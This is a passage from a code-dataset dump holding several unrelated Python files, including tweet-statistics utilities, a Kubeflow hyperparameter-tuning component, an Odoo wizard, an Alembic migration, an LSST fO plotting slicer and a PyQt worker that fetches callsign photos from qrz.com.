central(str(args.address))\n","sub_path":"smart-projects/python-bluezero/examples/level10/microbit_button.py","file_name":"microbit_button.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"517919634","text":"from datetime import datetime\nimport operator\nimport rates\n\n\ndef is_only_link(string):\n st = string.split(' ')\n return len(st) == 1 and 'http' in string\n\n\ndef clean_words(word):\n return remove_spaces([''.join(c for c in w if c.isalpha() or c == '') for w in word.split(' ')])\n\n\ndef remove_spaces(word):\n tmp = []\n for i in word:\n if i != '':\n tmp.append(i)\n return tmp\n\n\ndef datetime_to_string(date):\n dt = datetime.fromisoformat(date)\n return dt.strftime('%H:%M')\n\n\ndef datetime_to_date(date):\n dt = datetime.fromisoformat(date)\n return dt.strftime('%d/%m/%Y %H:%M')\n\n\ndef gen_hours_data(data):\n cr_at = [x['created_at'] for x in data['tweets']]\n times = list(map(datetime_to_string, cr_at))\n\n hours = {}\n for i in times:\n try:\n hours[i[0:2]] += 1\n except:\n hours[i[0:2]] = 1\n\n return hours\n\n\ndef gen_words_data(data):\n\n words = [x['words'] for x in data['tweets']]\n flat_words = []\n for i in words:\n if isinstance(i, list):\n for j in i:\n flat_words.append(j.lower())\n else:\n flat_words.append(i.lower())\n for i in flat_words:\n if len(i) <= 3:\n flat_words.remove(i)\n\n dt = {}\n for i in flat_words:\n try:\n dt[i] += 1\n except:\n dt[i] = 1\n tmp = []\n for i in dt:\n if dt[i] < 5:\n tmp.append(i)\n for i in tmp:\n del dt[i]\n\n return dt\n\n\ndef top_n_values(data, props, n):\n d = data[props]\n\n sorted_x = sorted(d.items(), key=operator.itemgetter(1), reverse=True)\n\n y = {}\n for i in sorted_x[:n]:\n y[i[0]] = i[1]\n return y\n\n\ndef gen_rates(text):\n res = []\n for t in text:\n res.append(rates.rate(t))\n\n r = {}\n for i in rates.bases + [None]:\n try:\n if i is None:\n r['indef'] = res.count(i)\n else:\n r[i] = res.count(i)\n except:\n pass\n return r\n\n\ndef sumDics(li):\n x = {}\n\n for i in li:\n for j in i:\n try:\n x[j] += i[j]\n except:\n x[j] = i[j]\n return x\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"614512193","text":"# pytype: disable=annotation-type-mismatch\nfrom typing import NamedTuple\nfrom google.cloud.aiplatform_v1.types import study\nfrom kfp import components\n\n\ndef hyperparameter_tuning_job_run_op(\n display_name: str,\n project: str,\n base_output_directory: str,\n worker_pool_specs: list,\n study_spec_metrics: dict,\n study_spec_parameters: list,\n max_trial_count: int,\n parallel_trial_count: int,\n max_failed_trial_count: int = 0,\n location: str = \"us-central1\",\n study_spec_algorithm: str = \"ALGORITHM_UNSPECIFIED\",\n study_spec_measurement_selection_type: str = \"BEST_MEASUREMENT\",\n encryption_spec_key_name: str = None,\n service_account: str = None,\n network: str = None,\n) -> NamedTuple('Outputs', [\n (\"trials\", list),\n]):\n \"\"\"\n Creates a Google Cloud AI Platform HyperparameterTuning Job and waits for it to complete.\n\n For example usage, see https://github.com/kubeflow/pipelines/blob/master/components/google-cloud/google_cloud_pipeline_components/experimental/hyperparameter_tuning_job/hp_tuning_job_sample.ipynb.\n\n For more information on using hyperparameter tuning, please visit:\n https://cloud.google.com/vertex-ai/docs/training/using-hyperparameter-tuning\n\n Args:\n Creates a Google Cloud AI Platform HyperparameterTuning Job and waits for it to complete.\n\n For example usage, see https://github.com/kubeflow/pipelines/blob/master/components/google-cloud/google_cloud_pipeline_components/experimental/hyperparameter_tuning_job/hp_tuning_job_sample.ipynb.\n\n For more information on using hyperparameter tuning, please visit:\n https://cloud.google.com/vertex-ai/docs/training/using-hyperparameter-tuning\n\n Args:\n display_name (str):\n Required. The user-defined name of the HyperparameterTuningJob.\n The name can be up to 128 characters long and can be consist\n of any UTF-8 characters.\n project (str):\n Required. Project to run the HyperparameterTuningJob in.\n base_output_directory (str):\n Required. The Cloud Storage location to store the output of this\n HyperparameterTuningJob. The base_output_directory of each\n child CustomJob backing a Trial is set to a subdirectory\n with name as the trial id under its parent HyperparameterTuningJob's\n base_output_directory. The following Vertex AI environment\n variables will be passed to containers or python modules\n when this field is set:\n For CustomJob backing a Trial of HyperparameterTuningJob:\n * AIP_MODEL_DIR = `\\/\\/model\\/`\n * AIP_CHECKPOINT_DIR = `\\/\\/checkpoints\\/`\n * AIP_TENSORBOARD_LOG_DIR = `\\/\\/logs\\/`\n worker_pool_specs (List[Dict]):\n Required. The spec of the worker pools including machine type and Docker image.\n All worker pools except the first one are optional and can be skipped by providing\n an empty value.\n study_spec_metrics: (Dict[str, str]):\n Required. Dictionary representing metrics to optimize. The dictionary key is the metric_id,\n which is reported by your training job, and the dictionary value is the\n optimization goal of the metric ('minimize' or 'maximize'). example:\n metrics = {'loss': 'minimize', 'accuracy': 'maximize'}\n study_spec_parameters (list[str]):\n Required. List serialized from the parameter dictionary. The dictionary\n represents parameters to optimize. The dictionary key is the parameter_id,\n which is passed into your training job as a command line key word argument, and the\n dictionary value is the parameter specification of the metric.\n from google.cloud.aiplatform import hyperparameter_tuning as hpt\n from google_cloud_pipeline_components.experimental import hyperparameter_tuning_job\n parameters = hyperparameter_tuning_job.serialize_parameters({\n 'lr': hpt.DoubleParameterSpec(min=0.001, max=0.1, scale='log'),\n 'units': hpt.IntegerParameterSpec(min=4, max=128, scale='linear'),\n 'activation': hpt.CategoricalParameterSpec(values=['relu', 'selu']),\n 'batch_size': hpt.DiscreteParameterSpec(values=[128, 256], scale='linear')\n })\n Supported parameter specifications can be found in aiplatform.hyperparameter_tuning.\n These parameter specification are currently supported:\n DoubleParameterSpec, IntegerParameterSpec, CategoricalParameterSpace, DiscreteParameterSpec\n max_trial_count (int):\n Required. The desired total number of Trials.\n parallel_trial_count (int):\n Required. The desired number of Trials to run in parallel.\n max_failed_trial_count (Optional[int]):\n The number of failed Trials that need to be\n seen before failing the HyperparameterTuningJob.\n If set to 0, Vertex AI decides how many Trials\n must fail before the whole job fails.\n location (Optional[str]):\n Location to run the HyperparameterTuningJob in, defaults\n to \"us-central1\"\n study_spec_algorithm (Optional[str]):\n The search algorithm specified for the Study.\n Accepts one of the following:\n * `ALGORITHM_UNSPECIFIED` - If you do not specify an algorithm,\n your job uses the default Vertex AI algorithm. The default\n algorithm applies Bayesian optimization to arrive at the optimal\n solution with a more effective search over the parameter space.\n * 'GRID_SEARCH' - A simple grid search within the feasible space.\n This option is particularly useful if you want to specify a\n quantity of trials that is greater than the number of points in\n the feasible space. In such cases, if you do not specify a grid\n search, the Vertex AI default algorithm may generate duplicate\n suggestions. To use grid search, all parameter specs must be\n of type `IntegerParameterSpec`, `CategoricalParameterSpace`,\n or `DiscreteParameterSpec`.\n * 'RANDOM_SEARCH' - A simple random search within the feasible\n space.\n study_spec_measurement_selection_type (Optional[str]):\n This indicates which measurement to use if/when the service\n automatically selects the final measurement from previously reported\n intermediate measurements.\n Accepts: 'BEST_MEASUREMENT', 'LAST_MEASUREMENT'\n Choose this based on two considerations:\n A) Do you expect your measurements to monotonically improve? If so,\n choose 'LAST_MEASUREMENT'. On the other hand, if you're in a situation\n where your system can \"over-train\" and you expect the performance to\n get better for a while but then start declining, choose\n 'BEST_MEASUREMENT'. B) Are your measurements significantly noisy\n and/or irreproducible? If so, 'BEST_MEASUREMENT' will tend to be\n over-optimistic, and it may be better to choose 'LAST_MEASUREMENT'. If\n both or neither of (A) and (B) apply, it doesn't matter which\n selection type is chosen.\n encryption_spec_key_name (Optional[str]):\n Customer-managed encryption key options for a\n HyperparameterTuningJob. If this is set, then\n all resources created by the\n HyperparameterTuningJob will be encrypted with\n the provided encryption key.\n\n Has the form:\n ``projects/my-project/locations/my-location/keyRings/my-kr/cryptoKeys/my-key``.\n The key needs to be in the same region as where the compute\n resource is created.\n service_account (Optional[str]):\n Specifies the service account for workload run-as account.\n Users submitting jobs must have act-as permission on this run-as account.\n network (Optional[str]):\n The full name of the Compute Engine network to which the job\n should be peered. For example, projects/12345/global/networks/myVPC.\n Private services access must already be configured for the network.\n If left unspecified, the job is not peered with any network.\n Returns:\n List of HyperparameterTuningJob trials\n \"\"\"\n from google.cloud import aiplatform\n from google.cloud.aiplatform import hyperparameter_tuning as hpt\n from google.cloud.aiplatform_v1.types import study\n from google.cloud.aiplatform.hyperparameter_tuning import _SCALE_TYPE_MAP\n\n # Reverse the _SCALE_TYPE_MAP dict for deserialization\n SCALE_MAP = dict((reversed(item) for item in _SCALE_TYPE_MAP.items()))\n\n PARAMETER_SPEC_MAP = {\n hpt.DoubleParameterSpec._parameter_spec_value_key: hpt.DoubleParameterSpec,\n hpt.IntegerParameterSpec._parameter_spec_value_key: hpt.IntegerParameterSpec,\n hpt.CategoricalParameterSpec._parameter_spec_value_key: hpt.CategoricalParameterSpec,\n hpt.DiscreteParameterSpec._parameter_spec_value_key: hpt.DiscreteParameterSpec,\n }\n\n ALGORITHM_MAP = {\n 'ALGORITHM_UNSPECIFIED': None,\n 'GRID_SEARCH': 'grid',\n 'RANDOM_SEARCH': 'random',\n }\n\n MEASUREMENT_SELECTION_TYPE_MAP = {\n 'BEST_MEASUREMENT': 'best',\n 'LAST_MEASUREMENT': 'last',\n }\n\n aiplatform.init(project=project, location=location,\n staging_bucket=base_output_directory)\n\n # Deserialize the parameters\n parameters_kwargs = {}\n for parameter in study_spec_parameters:\n param = study.StudySpec.ParameterSpec.from_json(parameter)\n parameter_id = param.parameter_id\n param_attrs = {}\n for parameter_spec_value_key, parameter_spec in PARAMETER_SPEC_MAP.items():\n if getattr(param, parameter_spec_value_key):\n attrs = getattr(param, parameter_spec_value_key)\n for parameter, value in parameter_spec._parameter_value_map:\n if hasattr(attrs, value):\n param_attrs[parameter] = getattr(attrs, value)\n # Detect 'scale' in list of arguments to parameter_spec.__init__\n param_spec_code = parameter_spec.__init__.__code__\n if 'scale' in param_spec_code.co_varnames[:param_spec_code.co_argcount]:\n param_attrs['scale'] = SCALE_MAP[param.scale_type]\n parameters_kwargs[parameter_id] = parameter_spec(\n **param_attrs) # pytype: disable=wrong-keyword-args\n break\n\n custom_job_display_name = display_name + '_custom_job'\n\n job = aiplatform.CustomJob(\n display_name=custom_job_display_name,\n staging_bucket=base_output_directory,\n worker_pool_specs=worker_pool_specs,\n )\n\n hp_job = aiplatform.HyperparameterTuningJob(\n display_name=display_name,\n custom_job=job,\n metric_spec=study_spec_metrics,\n parameter_spec={\n **parameters_kwargs\n },\n max_trial_count=max_trial_count,\n parallel_trial_count=parallel_trial_count,\n max_failed_trial_count=max_failed_trial_count,\n search_algorithm=ALGORITHM_MAP[study_spec_algorithm],\n measurement_selection=MEASUREMENT_SELECTION_TYPE_MAP[\n study_spec_measurement_selection_type\n ],\n encryption_spec_key_name=encryption_spec_key_name\n )\n\n hp_job.run(\n service_account=service_account,\n network=network)\n\n trials = [study.Trial.to_json(trial) for trial in hp_job.trials]\n\n return trials # pytype: disable=bad-return-type\n\n\ndef serialize_parameters(parameters: dict) -> list:\n \"\"\"\n Serializes the hyperparameter tuning parameter spec.\n\n Args:\n parameters (Dict[str, hyperparameter_tuning._ParameterSpec]):\n Dictionary representing parameters to optimize. The dictionary key is the parameter_id,\n which is passed into your training job as a command line key word argument, and the\n dictionary value is the parameter specification of the metric.\n from google.cloud.aiplatform import hyperparameter_tuning as hpt\n parameters={\n 'decay': hpt.DoubleParameterSpec(min=1e-7, max=1, scale='linear'),\n 'learning_rate': hpt.DoubleParameterSpec(min=1e-7, max=1, scale='linear')\n 'batch_size': hpt.DiscreteParamterSpec(values=[4, 8, 16, 32, 64, 128], scale='linear')\n }\n Supported parameter specifications can be found until aiplatform.hyperparameter_tuning.\n These parameter specification are currently supported:\n DoubleParameterSpec, IntegerParameterSpec, CategoricalParameterSpace, DiscreteParameterSpec\n\n Returns:\n List containing an intermediate JSON representation of the parameter spec\n\n \"\"\"\n return [\n study.StudySpec.ParameterSpec.to_json(\n parameter._to_parameter_spec(parameter_id=parameter_id))\n for parameter_id, parameter in parameters.items()\n ]\n\nif __name__ == '__main__':\n HyperparameterTuningJobRunOp = components.create_component_from_func(\n hyperparameter_tuning_job_run_op,\n base_image='python:3.8',\n packages_to_install=['google-cloud-aiplatform', 'kfp'],\n output_component_file='component.yaml',\n )\n","sub_path":"components/google-cloud/google_cloud_pipeline_components/experimental/hyperparameter_tuning_job/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":13566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"391679094","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, api\n\nclass wiz_assign_owner(models.TransientModel):\n\n _name = 'wiz.assign.owner'\n reviewer_id = fields.Many2one('res.users',string='Reviewer',required=True)\n\n @api.one\n def assign_owner(self):\n context = self._context\n active_id = context.get('active_id')\n reviewer_id = self.reviewer_id and self.reviewer_id.id or False\n cost_sheet = self.env['od.cost.sheet']\n cost_sheet_obj = cost_sheet.browse(active_id)\n cost_sheet_obj.write({'reviewed_id':reviewer_id})\n cost_sheet_obj.od_send_mail('cst_sheet_owner_assigned')\n return True\n","sub_path":"orchid_cost_sheet/wizard/assign_owner.py","file_name":"assign_owner.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"196991138","text":"# fibonacci.py\n# Fibonacci sequence\n#\n# Michael Kemp\n# 9-09-2013\n \ndef main():\n \n # Gotta toot that horn.\n print(\"My incredible Fibonacci number generator!\")\n \n # Get generic integer input\n n = eval(input(\"Please enter an integer greater than 2: \"))\n \n # Set the beginning of the Fibonacci sequence\n NUM_X = 0\n NUM_Y = 1\n \n # Repeat this sequence an arbitrary user specified number of times, n\n for i in range(1,n):\n \n # Set variable z to be the sum of NUM_X + NUM_Y\n z = NUM_X + NUM_Y\n \n # NUM_X gets NUM_Y and NUM_Y gets z\n NUM_X,NUM_Y = NUM_Y,z\n \n # Print the now changed variable NUM_Y\n print(\"The \", n, \"th number in the Fibonacci sequence is \", NUM_Y, sep='')\n \nmain()","sub_path":"lab02/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"419383805","text":"from Person import *\nfrom House import *\nfrom Driver import *\nfrom Programmer import *\n\nperson1 = Driver('Illya', 19)\nperson2 = Programmer('Dmitri', 20)\nhouse = House('Metalistov')\n\nperson1.setDrivExp(7)\nperson2.setProgExp(20)\n\nhouse.settlePerson(person1)\nhouse.settlePerson(person2)\n\nperson1.descriptionOfPerson()\nperson2.descriptionOfPerson()\n\nhouse.descriptionOfHouse()","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"512445058","text":"# -*- coding: latin-1 -*-\r\nfrom copy import deepcopy\r\nfrom Algorithmus import Nachbar\r\ndef Translate(L):\r\n data = [] #Output\r\n colors = [] #StartPunkte der Farben\r\n for y in range(len(L)):\r\n for x in range(len(L[y])):\r\n N = [] #Nachbarn ohne Zahl\r\n #Füge i ohne Zahl hinzu, i ist nicht = \"none\" und i ist von der Form FARBE1 oder FARBE2\r\n [N.append(i[:-1]) for i in Nachbar(L,x,y) if i != \"none\"]\r\n #Falls Farbe in Nachbarn nur 1mal vorkommt n(Ende einer Leitung) und die Farbe noch nicht schon hinzugefügt wurde\r\n if len([s for s in N if L[y][x][:-1] in s])==1 and L[y][x][:-1] not in [t[0] for t in colors]:\r\n colors.append([L[y][x][:-1],x,y])\r\n for col in colors: #Für jede Farbe\r\n dat = \"(\"+str(col[1])+\",\"+str(col[2])+\")&\"\r\n x, y = col[1],col[2] #Startkoordinaten der Farbe\r\n while True:\r\n N = Nachbar(L,x,y)\r\n L[y][x] = \"none\" #Aktuelles Feld auf None, damit beim Naechsten nicht zurück geht\r\n if col[0] in N[0]:\r\n dat += \"r\" #Nachbar rechts\r\n x += 1\r\n elif col[0] in N[1]:\r\n dat += \"u\" #Nachbar unten\r\n y += 1\r\n elif col[0] in N[2]:\r\n dat += \"l\" #Nachbar links\r\n x -= 1\r\n elif col[0] in N[3]:\r\n dat += \"o\" #Nachbar oben\r\n y -=1\r\n else:\r\n break #Kein Nachbar mehr --> Ende der Farbe, aus while heraus\r\n data.append(dat) #String der Farbe an Output hinzufügen \r\n return data","sub_path":"Translator.py","file_name":"Translator.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"183030772","text":"# -*- coding: utf-8 -*-\n\"\"\"The tgapp-stroller2 package\"\"\"\nimport tg\nimport os\nfrom tg import hooks\n\ndepot_photos_path = os.path.join(\n os.getcwd(),\n 'public', 'depot'\n)\n\nproduct_photos_path = os.path.join(\n depot_photos_path,\n 'product_images'\n)\n\n\ndef plugme(app_config, options):\n try:\n # TG 2.3\n app_config['_pluggable_stroller2_config'] = options\n run_enable_depot = False\n if 'depot_backend_type' not in app_config.keys():\n app_config['depot_backend_type'] = 'depot.io.local.LocalFileStorage'\n if 'depot_storage_path' not in app_config.keys():\n app_config['depot_storage_path'] = depot_photos_path\n if 'depot.product_images.backend' not in app_config.keys():\n app_config['depot.product_images.backend'] = app_config['depot_backend_type']\n run_enable_depot = True\n if 'depot.product_images.backend' not in app_config.keys():\n app_config['depot.product_images.storage_path'] = product_photos_path\n run_enable_depot = True\n if run_enable_depot:\n hooks.register('after_config', enable_depot)\n except TypeError:\n # TG 2.4\n app_config.update_blueprint({\n '_pluggable_stroller2_config': options\n })\n run_enable_depot = False\n try:\n app_config.get_blueprint_value('depot_backend_type')\n except KeyError:\n app_config.update_blueprint({\n 'depot_backend_type': 'depot.io.local.LocalFileStorage'\n })\n try:\n app_config.get_blueprint_value('depot_storage_path')\n except KeyError:\n app_config.update_blueprint({\n 'depot_storage_path': depot_photos_path\n })\n try:\n app_config.get_blueprint_value('depot.product_images.backend')\n except KeyError:\n app_config.update_blueprint({\n 'depot.product_images.backend': 'depot.io.local.LocalFileStorage'\n })\n run_enable_depot = True\n try:\n app_config.get_blueprint_value('depot.product_images.storage_path')\n except KeyError:\n app_config.update_blueprint({\n 'depot.product_images.storage_path': product_photos_path\n })\n run_enable_depot = True\n if run_enable_depot:\n hooks.register('after_wsgi_middlewares', enable_depot)\n return dict(appid='commerce', global_helpers=True)\n\n\ndef enable_depot(app):\n import logging\n log = logging.getLogger('stroller2.depot')\n\n # DEPOT setup\n from depot.manager import DepotManager\n\n storages = {\n 'product_images': 'product_image'\n }\n\n for storage in storages:\n prefix = 'depot.%s.' % storage\n log.info('Configuring Storage %s*', prefix)\n DepotManager.configure(storage, tg.config, prefix)\n DepotManager.alias(storages[storage], storage)\n return app\n","sub_path":"stroller2/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"85886149","text":"\"\"\"result\n\nRevision ID: b59fd89c997f\nRevises: c0e99c26baf0\nCreate Date: 2018-05-16 12:11:18.778673\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'b59fd89c997f'\ndown_revision = 'c0e99c26baf0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.drop_column('tournament_competition', 'scheme_id')\n op.add_column(\n 'tournament_competition',\n sa.Column('scheme', sa.String, nullable=False),\n )\n\n op.add_column('phase_result', sa.Column('result', sa.JSON))\n op.add_column('match_competitor', sa.Column('result', sa.JSON))\n\n op.drop_table('match_competitor_result')\n op.drop_table('phase_result_field')\n op.drop_table('result_scheme_field')\n op.drop_table('result_scheme')\n op.drop_table('result_field')\n\n sa.Enum('match', 'competition', name='context_type').drop(\n bind=op.get_bind(),\n checkfirst=False,\n )\n\n\ndef downgrade():\n op.create_table(\n 'result_field',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('name', sa.String(length=200), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n )\n\n op.create_table(\n 'result_scheme',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('name', sa.String(length=200), nullable=False),\n sa.UniqueConstraint('name')\n )\n\n op.create_table(\n 'result_scheme_field',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('scheme_id', sa.Integer(), nullable=False),\n sa.Column('field_id', sa.Integer(), nullable=False),\n sa.Column('sort', sa.Integer(), nullable=True),\n sa.Column('context', sa.Enum('match', 'competition', name='context_type'), nullable=False),\n sa.ForeignKeyConstraint(['field_id'], ['result_field.id'], ),\n sa.ForeignKeyConstraint(['scheme_id'], ['result_scheme.id'], ),\n )\n\n op.create_index(op.f('ix_result_scheme_field_field_id'), 'result_scheme_field', ['field_id'], unique=False)\n op.create_index(op.f('ix_result_scheme_field_scheme_id'), 'result_scheme_field', ['scheme_id'], unique=False)\n op.create_index(op.f('ix_result_scheme_field_sort'), 'result_scheme_field', ['sort'], unique=False)\n op.create_index(\n 'result_scheme_field_idx00',\n 'result_scheme_field',\n ['scheme_id', 'field_id', 'context'],\n unique=True,\n )\n\n op.create_table(\n 'phase_result_field',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('phase_result_id', sa.Integer(), nullable=False),\n sa.Column('field_id', sa.Integer(), nullable=False),\n sa.Column('result', sa.Float(), nullable=False),\n sa.ForeignKeyConstraint(['field_id'], ['result_field.id'], ),\n sa.ForeignKeyConstraint(['phase_result_id'], ['phase_result.id'], ),\n )\n\n op.create_index(\n op.f('ix_phase_result_field_field_id'),\n 'phase_result_field',\n ['field_id'],\n unique=False,\n )\n op.create_index(\n op.f('ix_phase_result_field_phase_result_id'),\n 'phase_result_field',\n ['phase_result_id'],\n unique=False,\n )\n\n op.create_table(\n 'match_competitor_result',\n sa.Column('id', sa.Integer(), nullable=False, autoincrement=True, primary_key=True),\n sa.Column('match_competitor_id', sa.Integer(), nullable=True),\n sa.Column('field_id', sa.Integer(), nullable=False),\n sa.Column('result', sa.Float(), nullable=False),\n sa.ForeignKeyConstraint(['field_id'], ['result_field.id'], ),\n sa.ForeignKeyConstraint(['match_competitor_id'], ['match_competitor.id'], ),\n )\n\n op.create_index(\n op.f('ix_match_competitor_result_field_id'),\n 'match_competitor_result',\n ['field_id'],\n unique=False,\n )\n op.create_index(\n op.f('ix_match_competitor_result_match_competitor_id'),\n 'match_competitor_result',\n ['match_competitor_id'],\n unique=False,\n )\n\n op.add_column(\n 'tournament_competition',\n sa.Column('scheme_id', sa.Integer(), sa.ForeignKey('result_scheme.id'), nullable=False),\n )\n\n op.drop_column('tournament_competition', 'scheme')\n op.drop_column('phase_result', 'result')\n op.drop_column('match_competitor', 'result')\n","sub_path":"tman_sqlalchemy_storage/alembic/versions/b59fd89c997f_result.py","file_name":"b59fd89c997f_result.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"135982838","text":"#!/usr/bin/env python3\n#-*-coding:utf-8-*-\nimport os \nfrom PIL import Image\ndef change_picsize(pic_path):\n\tfor pic_list in os.listdir(pic_path):\n\t\tim=Image.open(os.path.join(pic_path,pic_list))\n\t\tw,h=im.size\n\t\tn=h/1366\n\t\tm=w/644\n\t\tim.thumbnail((w/m,h/n))\n\t\tim.save('worked_'+pic_list.split('.')[0]+'.jpg','jpeg')\n\t\treturn (w/m,h/n)\nif __name__=='__main__':\n\tchange_picsize('/Users/yangming/Desktop/pil_learn/python_practice/fiv')\n","sub_path":"0005/0005.py","file_name":"0005.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"58974515","text":"# Class for computing the f_0 metric. Nearly identical\n# to HealpixSlicer, but with an added plotting method\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport healpy as hp\n\nfrom .healpixSlicer import HealpixSlicer\nfrom lsst.sims.maf.metrics.summaryMetrics import fOArea, fONv\n\n__all__ = ['fOSlicer']\n\nclass fOSlicer(HealpixSlicer):\n \"\"\"fO spatial slicer\"\"\"\n def __init__(self, nside=128, spatialkey1 ='fieldRA' , spatialkey2='fieldDec', verbose=True, **kwargs):\n super(fOSlicer, self).__init__(verbose=verbose, spatialkey1=spatialkey1, spatialkey2=spatialkey2,\n nside=nside, **kwargs)\n # Override base plotFuncs dictionary, because we don't want to create plots from Healpix\n # slicer (skymap, power spectrum, and histogram) -- only fO plot -- when using 'plotData'.\n self.plotFuncs = {'plotFO':self.plotFO}\n\n\n def plotFO(self, metricValue, title=None, xlabel='Number of Visits',\n ylabel='Area (1000s of square degrees)', fignum=None,\n scale=None, Asky=18000., Nvisit=825,\n xMin=None, xMax=None, yMin=None, yMax=None, **kwargs):\n \"\"\"\n Note that Asky and Nvisit need to be set for both the slicer and the summary statistic\n for the plot and returned summary stat values to be consistent!\n \"\"\"\n colorlinewidth = 2\n if scale is None:\n scale = (hp.nside2pixarea(self.nside, degrees=True) / 1000.0)\n if fignum:\n fig = plt.figure(fignum)\n else:\n fig = plt.figure()\n # Expect metricValue to be something like number of visits\n cumulativeArea = np.arange(1,metricValue.compressed().size+1)[::-1]*scale\n plt.plot(np.sort(metricValue.compressed()), cumulativeArea,'k-', linewidth=2, zorder = 0)\n # This is breaking the rules and calculating the summary stats in two places.\n # One way to possibly clean this up in the future would be to change the order\n # things are done in the driver so that summary stats get computed first and passed along to the plotting.\n rarr = np.array(zip(metricValue.compressed()),\n dtype=[('fO', metricValue.dtype)])\n fOArea_value = fOArea(col='fO', Asky=Asky, norm=False,\n nside=self.nside).run(rarr)\n fONv_value = fONv(col='fO', Nvisit=Nvisit, norm=False,\n nside=self.nside).run(rarr)\n fOArea_value_n = fOArea(col='fO', Asky=Asky, norm=True,\n nside=self.nside).run(rarr)\n fONv_value_n = fONv(col='fo',Nvisit=Nvisit, norm=True,\n nside=self.nside).run(rarr)\n\n plt.axvline(x=Nvisit, linewidth=colorlinewidth, color='b')\n plt.axhline(y=Asky/1000., linewidth=colorlinewidth,color='r')\n\n plt.axhline(y=fONv_value/1000., linewidth=colorlinewidth, color='b',\n alpha=.5, label=r'f$_0$ Nvisits=%.3g'%fONv_value_n)\n plt.axvline(x=fOArea_value , linewidth=colorlinewidth,color='r',\n alpha=.5, label='f$_0$ Area=%.3g'%fOArea_value_n)\n plt.legend(loc='lower left', fontsize='small', numpoints=1)\n\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n\n if title is not None:\n plt.title(title)\n\n if (xMin is not None) & (xMax is not None):\n plt.xlim([xMin,xMax])\n if (yMin is not None) & (yMax is not None):\n plt.ylim([yMin,yMax])\n\n return fig.number\n","sub_path":"python/lsst/sims/maf/slicers/fOSlicer.py","file_name":"fOSlicer.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"199416108","text":"# -*- coding: utf-8 -*-\n# vim:fileencoding=utf-8\n\nimport urllib\nimport std\nimport requests\nimport shutil\nimport os\nfrom os.path import expanduser\nfrom bs4 import BeautifulSoup\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtGui import QPixmap\n# import urllib.request\n# import urllib.parse\nfrom urllib.request import urlretrieve\nfrom urllib.parse import quote\nfrom PyQt5.QtCore import QThread\nfrom PyQt5 import QtCore\nfrom PyQt5.QtWidgets import QWidget\nimport main\n\n\nclass internetWorker(QThread):\n\n def __init__(self, window, callsign, settings, parrent=None):\n super().__init__()\n self.internet_search_window = window\n self.callsign = callsign\n self.settings = settings\n\n def run(self):\n # print (self.callsign)\n info_from_internet_array = internetWorker.get_image_from_server(self)\n # print (info_from_internet_array)\n if info_from_internet_array != {}:\n pixmap = QPixmap(info_from_internet_array.get('img'))\n #pixmap_resized = pixmap.scaled(int(self.settings['search-internet-width']) - 8,\n # int(self.settings['search-internet-height']) - 8,\n # QtCore.Qt.KeepAspectRatio)\n pixmap_resized = pixmap.scaledToWidth(int(self.settings['image-width']) - 8)\n\n pixmap_resized_height = pixmap_resized.scaledToHeight(int(self.settings['image-height']) - 8)\n self.internet_search_window.labelImage.setPixmap(pixmap_resized_height)\n # return info_from_internet_array\n\n def get_image_from_server(self):\n '''\n метод загружает изображение с qrz.com\n принимает callsign - позывной\n '''\n url_found = \"https://www.qrz.com/lookup\"\n # print(self.callsign)\n parameter_request = \"tquery=\" + self.callsign + \"&mode: callsign\"\n parameter_to_byte = bytearray(parameter_request, \"utf-8\")\n data_dictionary = {}\n try:\n response = urllib.request.urlopen(url_found, parameter_to_byte)\n html = response.read().decode(\"utf-8\")\n soup = BeautifulSoup(html, 'html.parser')\n except Exception:\n print(\"get_image_from_server: Don't connection\")\n\n img = soup.find(id=\"mypic\")\n\n file_name = self.callsign.replace(\"/\", \"_\")\n # print(\"file_name, img:_>\", file_name, img)\n\n\n try:\n if img != None:\n urllib.request.urlretrieve(img['src'], \"image/\" + file_name + \".jpg\")\n data_dictionary.update({'img': \"image/\" + file_name + \".jpg\"})\n # print(data_dictionary)\n except Exception:\n print(\"Exception:\", Exception)\n\n return data_dictionary\n\n\nclass Eqsl_services (QThread):\n\n def __init__(self, settingsDict, recordObject, std, parent_window):\n super().__init__()\n self.recordObject = recordObject\n self.settingsDict = 